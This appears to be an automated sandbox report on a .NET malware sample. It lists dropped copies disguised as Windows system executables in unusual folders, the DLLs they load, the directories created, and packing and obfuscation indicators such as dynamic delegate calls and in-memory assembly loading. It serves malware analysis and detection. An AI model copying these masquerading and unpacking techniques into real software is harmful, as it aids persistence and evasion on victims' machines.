Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: mscoree.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: version.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: wldp.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: profapi.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: mscoree.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: version.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: wldp.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: profapi.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: version.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: wldp.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: profapi.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: version.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: wldp.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: profapi.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Mail\ctfmon.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\B9exXW7c3t.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Directory created: C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Directory created: C:\Program Files\Microsoft\OneDrive\ListSync\2e26acd4fd0504	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Directory created: C:\Program Files\Windows Mail\ctfmon.exe	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Directory created: C:\Program Files\Windows Mail\26c12092da979c	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Directory created: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Directory created: C:\Program Files\Common Files\System\msadc\en-US\cc11b995f2a76d	Jump to behavior

Source: B9exXW7c3t.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: B9exXW7c3t.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: B9exXW7c3t.exe

Static file information: File size 1433600 > 1048576

Source: B9exXW7c3t.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x15a600

Source: B9exXW7c3t.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: B9exXW7c3t.exe, xWGOqHsklDSgxDT0Beu.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: B9exXW7c3t.exe, tGEHOreX6Fv3rwi0J5r.cs	.Net Code: wYSImbbIME System.AppDomain.Load(byte[])
Source: B9exXW7c3t.exe, tGEHOreX6Fv3rwi0J5r.cs	.Net Code: wYSImbbIME System.Reflection.Assembly.Load(byte[])
Source: B9exXW7c3t.exe, tGEHOreX6Fv3rwi0J5r.cs	.Net Code: wYSImbbIME

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Code function: 0_2_00007FF848F300BD pushad ; iretd	0_2_00007FF848F300C1
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Code function: 0_2_00007FF848F37BF7 push ecx; iretd	0_2_00007FF848F37BFA
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Code function: 26_2_00007FF848F07BF7 push ecx; iretd	26_2_00007FF848F07BFA
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Code function: 26_2_00007FF848F000BD pushad ; iretd	26_2_00007FF848F000C1
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Code function: 27_2_00007FF848F3DFCA pushad ; retf	27_2_00007FF848F3DFCD
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Code function: 27_2_00007FF848F300BD pushad ; iretd	27_2_00007FF848F300C1
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Code function: 27_2_00007FF848F37BF7 push ecx; iretd	27_2_00007FF848F37BFA
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Code function: 28_2_00007FF848F400BD pushad ; iretd	28_2_00007FF848F400C1
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Code function: 28_2_00007FF848F47BF7 push ecx; iretd	28_2_00007FF848F47BFA
Source: C:\Program Files\Windows Mail\ctfmon.exe	Code function: 29_2_00007FF848F4DFCA pushad ; retf	29_2_00007FF848F4DFCD
Source: C:\Program Files\Windows Mail\ctfmon.exe	Code function: 29_2_00007FF848F400BD pushad ; iretd	29_2_00007FF848F400C1
Source: C:\Program Files\Windows Mail\ctfmon.exe	Code function: 29_2_00007FF848F47BF7 push ecx; iretd	29_2_00007FF848F47BFA
Source: C:\Program Files\Windows Mail\ctfmon.exe	Code function: 30_2_00007FF848F4DFCA pushad ; retf	30_2_00007FF848F4DFCD
Source: C:\Program Files\Windows Mail\ctfmon.exe	Code function: 30_2_00007FF848F400BD pushad ; iretd	30_2_00007FF848F400C1
Source: C:\Program Files\Windows Mail\ctfmon.exe	Code function: 30_2_00007FF848F47BF7 push ecx; iretd	30_2_00007FF848F47BFA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Code function: 31_2_00007FF848F400BD pushad ; iretd	31_2_00007FF848F400C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Code function: 31_2_00007FF848F47BF7 push ecx; iretd	31_2_00007FF848F47BFA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Code function: 31_2_00007FF848F4DFCA pushad ; retf	31_2_00007FF848F4DFCD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Code function: 32_2_00007FF848F100BD pushad ; iretd	32_2_00007FF848F100C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Code function: 32_2_00007FF848F17BF7 push ecx; iretd	32_2_00007FF848F17BFA
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Code function: 33_2_00007FF848F100BD pushad ; iretd	33_2_00007FF848F100C1
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Code function: 33_2_00007FF848F17BF7 push ecx; iretd	33_2_00007FF848F17BFA
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Code function: 33_2_00007FF848F1DFCA pushad ; retf	33_2_00007FF848F1DFCD
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Code function: 34_2_00007FF848F3DFCA pushad ; retf	34_2_00007FF848F3DFCD
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Code function: 34_2_00007FF848F300BD pushad ; iretd	34_2_00007FF848F300C1
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Code function: 34_2_00007FF848F37BF7 push ecx; iretd	34_2_00007FF848F37BFA
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Code function: 35_2_00007FF848F200BD pushad ; iretd	35_2_00007FF848F200C1
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Code function: 35_2_00007FF848F27BF7 push ecx; iretd	35_2_00007FF848F27BFA
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Code function: 35_2_00007FF848F2DFCA pushad ; retf	35_2_00007FF848F2DFCD
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Code function: 36_2_00007FF848F200BD pushad ; iretd	36_2_00007FF848F200C1
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Code function: 36_2_00007FF848F27BF7 push ecx; iretd	36_2_00007FF848F27BFA

Source: B9exXW7c3t.exe	Static PE information: section name: .text entropy: 7.181001669027784
Source: QeWHGGzCXwoQygZUiDI.exe.0.dr	Static PE information: section name: .text entropy: 7.181001669027784
Source: winlogon.exe.0.dr	Static PE information: section name: .text entropy: 7.181001669027784
Source: QeWHGGzCXwoQygZUiDI.exe0.0.dr	Static PE information: section name: .text entropy: 7.181001669027784
Source: RuntimeBroker.exe.0.dr	Static PE information: section name: .text entropy: 7.181001669027784

Source: B9exXW7c3t.exe, mUOGFuaUTbL16qXydlh.cs	High entropy of concatenated method names: '_364', 'DvbG4MTmGO', 'QdmG7PiI0B', 'IP4GptVdF0', 'KV0GTWUXZg', 'Jb2G5iyvBL', 'tY1G0F745A', 'dq31obNabkOBr7Ad3yp', 'zg8f96NHxWoNK4AagtH', 'PrMBrPNNQGPRXpeYCAd'
Source: B9exXW7c3t.exe, DN9sW0x2Z9MMTpAyCO.cs	High entropy of concatenated method names: '_3C3', '_7WJ', 'S9L', 'B28', 'dxx37vAZb', 'pOXGreD8pT0AL4s4bFk', 'nwRqiwDZN96d0uTOpA2', 'TDme1HDEiHAhCm1fVVq', 'E2ZnsvDrDNSgDgCHbBt', 'UPn3IiDvvjv7ueKQ9vt'
Source: B9exXW7c3t.exe, L3vUX1IfxFD46E7BKwD.cs	High entropy of concatenated method names: 'oB5', '_7u7', '_4U6', 'CisBH65CSr', 'E5xdJiZiet', 'FIfBFKGx36', 'OBndIBbqgI', 'dSHSJrFfVT3xbxssqKA', 'gvv9AEFSLXP0IKGCkSn', 'dJiNk1F4QpdgpvjSfy9'
Source: B9exXW7c3t.exe, E3hYP5DV9FCTZHOWDio.cs	High entropy of concatenated method names: 'e4lRv2BcsQ', 'CvspoObZEA3J1XWBrju', 'FpUhCwbEPnlWNd1f1FX', 'dSywW2bxiyinLFUlcWd', 'tH8XSOb8gG9HLow3Hj6', '_8e5', 'du0KfqWdGP', 'E75', '_2e1', '_127'
Source: B9exXW7c3t.exe, CwOI7WyuvQkS7eL03bb.cs	High entropy of concatenated method names: 'lDyyAsXIXT', 'KuKOdKjcvCc92PdNK6D', 'ShxQIqjNmvyFqqlbutZ', 'AMmtYmjFJlUGP1i4VKA', 'fYBwOmjY9Dx2vmcxbbn', 'hwGokfjVNy5C7FhPIm3', 'amy', '_7WJ', '_3TA', 'B28'
Source: B9exXW7c3t.exe, rdojq4ItpbW8XRCNNUk.cs	High entropy of concatenated method names: 'YBUg2JYblX4P7PQaFKo', 'WuOXZcYfOOwIdK4WqGa', 'OojMlbYMhtolw5LkmIg', 'FCmsJjY4Iw48gm9aI0Q', '_26G', 'z33', 'wXdBLhliaP', 'LXfBOLONwE', '_987', 'oIiBUK6nW4'
